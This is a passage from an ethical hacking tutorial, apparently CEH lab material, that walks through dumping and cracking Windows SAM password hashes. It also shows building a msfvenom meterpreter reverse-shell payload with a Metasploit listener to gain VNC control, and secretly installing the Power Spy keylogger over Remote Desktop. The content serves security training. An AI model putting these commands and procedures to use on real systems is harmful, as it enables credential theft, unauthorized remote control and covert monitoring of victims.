Ethical Hacking Tutorial

System Hacking Practical

Extracting Plaintext Passwords by Dumping and Cracking SAM Hashes

Security Account Manager (SAM) is a database file which includes user accounts and security descriptors of users. This file stays on the Windows systems. The passwords in this file are saved in hashed format for better security.

When hackers attack a system, they usually dump the OS password hashes after compromising the target machine. They can use password hashes to carry out various types of attacks on the system. It can also allow them to crack passwords, bypass the hash, gain unauthorized access to other systems, analyze passwords, and recognize patterns for compromising other passwords as well.

To dump the SAM file content, you should have the admin access to it. While doing the password assessment, you will start with a simple SAM hash dump. It will run with a hash decrypter to find the plaintext passwords.

You can also use pwdump7 to dump protected files. In this lab, we will discuss the use of pwdump7 for extracting password hashes, and the use of Ophcrack tool for cracking the passwords and finding plain text passwords.

  1. Open Command Prompt and run it as admin.

  2. Write wmic useraccount get name,sid in the command prompt and press Enter. It will show the User Account Names along with the respective IDs. 

Minimize the command prompt window.

  1. Go to the Module 06 System Hacking\Password Cracking Tools. Right-click on the pwdump7 folder and choose Copy from the context menu.

  2. Paste the folder on your Desktop and close the File Explorer. 

  3. Open the Command Prompt and write cd C:\Users\Admin\Desktop\pwdump7. Press Enter.

  4. Write PwDump7.exe and press Enter. It will show the password hashes of the user accounts in the command prompt window. 

  5. For writing the password hashes to a file, write PwDump7.exe > c:\hashes.txt and press Enter. It will write the extracted passwords to a hashes.txt file. Then the file will be saved to C:\ drive.

  6. Go to the C:\ drive and open hashes.txt file. 

  7. In this file, replace the box symbol before every user ID with its User Name. 

  8. Click on File from the menu bar. Choose Save As for saving the edited version of the file. 

  9. While saving the file, choose Desktop as the destination folder.

  10. Go to Module 06 System hacking\Password Cracking Tools\ophcrack\x86. Double-click on ophcrack.exe to open the application. 

In case you see an error like Open File- Security Warning, click on Run.

  1. When the Ophcrack main window comes, click on Load in the menu bar and choose PWDUMP file from the dropdown.

  2. Open the PWDUMP file and choose hashes.txt file on the desktop. Open this file. 

  3. Click on Tables in the menu bar.

  4. When the Table Selection window comes, choose Vista free and click on Install.

  5. When the Select the directory which contains the tables window comes, choose the tables_vista_free folder. This folder is available in the Module 06 System Hacking\Password Cracking Tools\ophcrack. Click on Select Folder

  6. The chosen tables_vista_free is installed as Vista free. Choose the table and click on OK.

  7. Click on Crack in the menu bar. Ophcrack will start cracking the passwords. It takes 15 to 20 minutes to crack all the password hashes. 

  8. You will see the cracked passwords. 

  9. To start the next lab, copy the hashes.txt file from Desktop and paste it to Z:\CEHv10 Module 06 System Hacking\.

When hackers compromise a system and gain the password hashes with tools like PWdump7, they attempt to crack the hashes and obtain the passwords in plain-text.

Create and Use Rainbow Tables

After finding access to the SAM database dump of a system, the hackers use rainbow tables to recover the plain text password. 

In rainbow tables, there are precomputed tables of word lists, such as dictionary files, brute force lists, hash values, etc. These tables are used by hackers to recover the plaintext passwords from ciphertexts. They capture the password hashes and then compare them with the precomputed hash tables. If they find a match during comparison, the password is cracked. 

Let’s understand the process of creating rainbow tables and using them to crack hashes and find plain text passwords. 

Dir=”Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen

  1. Open Winrtgen. When the main window opens, click on Add Table to add a new rainbow table.

  2. It will show you the Rainbow Table Properties. From the Hash drawdown, select ntlm. Set Min Len as 4 and Max Len as 6. The Chain Count should be set to 4000000. Select loweralpha from the Charset dropdown. Click the OK button. 

  3. A new file will be created. You can view it in the Winrtgen window. Click OK.

  4. To start creating the rainbow tables, click on Start.

The tool can take around an hour to generate hashes. When this is done, keep it in the Module 06 Go to the Module 06 System Hacking\Password Cracking Tools\RainbowCrack. Then, double-click on the rcrack_gui.exe to open the RainbowCrack app.

In case there is an Open File - Security Warning error, click on Run

  1. From the menu bar, click on File. Next, click on Load NTLM Hashes from PWDUMP File.

  2. Visit the Module 06 System Hacking once the Open window shows up. Select hashes.txt file and click on Open.

  3. You will see the loaded hashes in the RainbowCrack app window.

  4. To use the rainbow table for cracking hashes, click on Rainbow Table. Next, click on Search Rainbow Tables.

  5. Visit the Module 06 System Hacking\Tools to create ntlm_loweralpha#4-6_0_2400x4000000_oxid#000.rt. Click on Open to open this file.

  6. Now, the RainbowCrack will initiate the process of cracking the hashes once the table loads. After it is done, you can see the cracked passwords. 

  7. Note the weak passwords. 

  8. Once the lab is complete, close all the windows.

Audit System Passwords With L0phtCrack

There can be several sorts of cyberattacks on the systems of a business, like spoofing, Denial of Service (DoS) attacks, smurfing, etc. 

In this lab, let’s understand password cracking, its role, how it is achieved, and the ways to protect against it. We will use the L0phtCrack tool to find user passwords that are easy to crack. 

Dir=”Module 06 System Hacking\Password Cracking Tools\L0phtCrack

  1. Launch L0phtCrack 7. When the Trail window comes, click on Proceed with Trial.

  2. Click on Password Auditing Wizard in the next dialog box.

  3. In the next window, you will view the Introduction. Click on Next.

  4. Select Windows and click on Next when the Choose Target System Type section opens.

  5. Select A rome machine and click on Next when the Windows Import window opens.

  6. Enter the following details when you see the Windows Import From Remote Machine section:

  • Host:

User credentials:

  • Username: Administrator 

  • Password: Pa$$w0rd

  • Domain:

Click on Next.  

  1. Once the Choose Audit Type section opens, select Strong Password Audit and click on Next.

  2. Check whether the Display passwords when audited and Display encrypted password hashes are selected in the Reporting Options section. Click on Next.

  3. Select Run this job immediately from the Job scheduling section. Click on Next.

  4. Click on Finish in the Summary section.

  5. Click on No in the Perform Calibration? pop-up.

  6. Click on Yes in the Copying LC7 Agent window.

  7. The tool will start the process of cracking 

  8. It can take up to five hours to crack all the passwords. Click on Stop.

  9. So, this is how you can attain the weak passwords. As an ethical hacker or security auditor, it is crucial for you to use strong passwords for all user accounts and prevent the passwords from being compromised. 

  10. Close the lab once you have noted down the cracked passwords. 

Exploiting Client-Side Vulnerabilities and Establishing VNC Session

Hackers use VNC to remotely access and control the computer devices by targeting them from other devices. Companies and IT teams also use VNC to provide support to teams and access their devices remotely. 

Here, let’s see how hackers can exploit the system vulnerabilities to start unauthorized sessions and control the devices. 

  1. Open the terminal window and write msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST= LPORT=444 -o /root/desktop/Test.exe. Press Enter.

This command will create a Test.exe exploit on the desktop of your Kali system.

  1. Create a directory to send the Text.exe file to the target machine. For copying the file from desktop to the shared location, follow the below steps:

  • Write mkdir /var/www/html/share and press Enter. It will create a new folder.

  • Write chmod -R 755 /var/www/html/share and press Enter.

  • Write chown -R www-data: /var/www/html/share. Press Enter.

  • For moving the file to the shared location, write mv /root/Desktop/Text.exe /var/www/html/share. Press Enter.

  1. Start the Apache Server. For this, write service apache2 start. Press Enter.

  2. Write msfconsole and press Enter to initiate the Metasploit Framework. 

  3. Once the Metasploit Framework starts running, write the below commands for setting up a listener:

  • Write use multi/handler. Press Enter.

  • Write set payload windows/meterpreter/reverse_tcp. Press Enter.

  • Write set LHOST Press Enter.

  • Write set LPORT 444. Press Enter.

Write run and press Enter to start the listener. 

  1. Start client windows.

  2. Launch a browser. Write in the address bar and hit Enter.

You can see the shared folder contents. Click on Test.exe file to download it.

  1. When the Save As window comes, select Desktop and click on Save.

  2. It will save the file on the Desktop. Double-click on it to execute it.

  3. Open Kali. Check that a session is created in the Meterpreter shell. 

In case the meterpreter command line doesn’t begin interacting with the target machine automatically, write sessions -i 1 and hit Enter. It will start the interaction. 

  1. Write sysinfo in the meterpreter command line. Press Enter to find the information of the target system.

  2. Write run vnc and hit Enter. It will begin a VNC session with the target. 

  3. It will show the TightVNC window, where you can see the victim Desktop.

  4. Once the lab is completed, close all the open windows.

Using Power Spy to Monitor and Record Web Activity

In this lab, we will demonstrate the way to create a remote desktop connection to a targeted machine and run Power Spy for monitoring the user activities in a secret manner. 

The techniques used for password cracking will also be used here to escalate privileges and dump the password hashes. After cracking the passwords, you can create a Remote Desktop Connection, install Spy, and keep it in a stealth mode.

Then you will need to login to a virtual machine to do the activities on the target system without being tracked. 

  1. Open the Remote Desktop Connection tool.

  2. When it opens, click on Show Options.

  3. Enter the IP of the Windows Server 2012 in the Computer field, write Username as admin and click on Connect.

  4. Now, the host machine will attempt creating a remote connection with the target machine.

When the Windows Security window comes, enter the password of the admin account. Click on OK

  1. When the Remote Desktop Connection window comes, click on Yes.

  2. It will successfully create a Remote Desktop connection. Go to the Module 06 System Hacking\Spyware\General Spyware\Power Spy in the File Explorer. Double-click on setup.exe.

If the Open File - Security Warning error comes, click on Run

  1. Once it is installed, go to the Desktop. Click on Run when the Run As Administrator window comes. 

If you see a web browser, close it.

  1. When the Setup Login Password window comes, enter the password in the New password section and then confirm it. Click on Submit.

  2. When the Information dialog box comes on the Setup window, click on OK.

  3. In the Enter Login Password window, enter your password and click on Submit.

  4. When the Register product window comes, click on Later to continue. 

  5. It will show the main window of Power Spy. 

  6. Click on Start Monitoring.

  7. Click on Stealth Mode. When the Hotkey reminder comes, click on OK

  8. When the Confirm dialog box comes, click on Yes. Now, disconnect the Remote Desktop Connection. 

Click on OK when the ‘Remote session will be disconnected’ prompt comes. 

  1. Log in to the Windows Server 2012 with an admin account. 

  2. Do any activity on the machine as a legitimate user. 

Next, you need to create a text file. In the file, write a few lines of text, like bank account numbers. Save and close it. 

  1. Click on Windows Server 2016 and run tasks 3-7 to start a Remote Desktop Connection.

In order to turn off the Power Spy stealth mode, press Ctrl+Alt+X. Click on Run when the Run as administrator window comes. 

  1. Enter the password in the Enter login password window and click on Submit.

  2. When the Register product window comes, click on Later.

  3. For stopping the monitoring, click on Stop Monitoring.

  4. Click on Keylogger from the Power Spy Control Panel to see the keystrokes of the user on the keyboard.

  5. It will show all the keystrokes.

  6. So, this is how the hackers can try to install keyloggers and gain access to information related to the users.  

It’s Quiz Time!

Did you find this article helpful?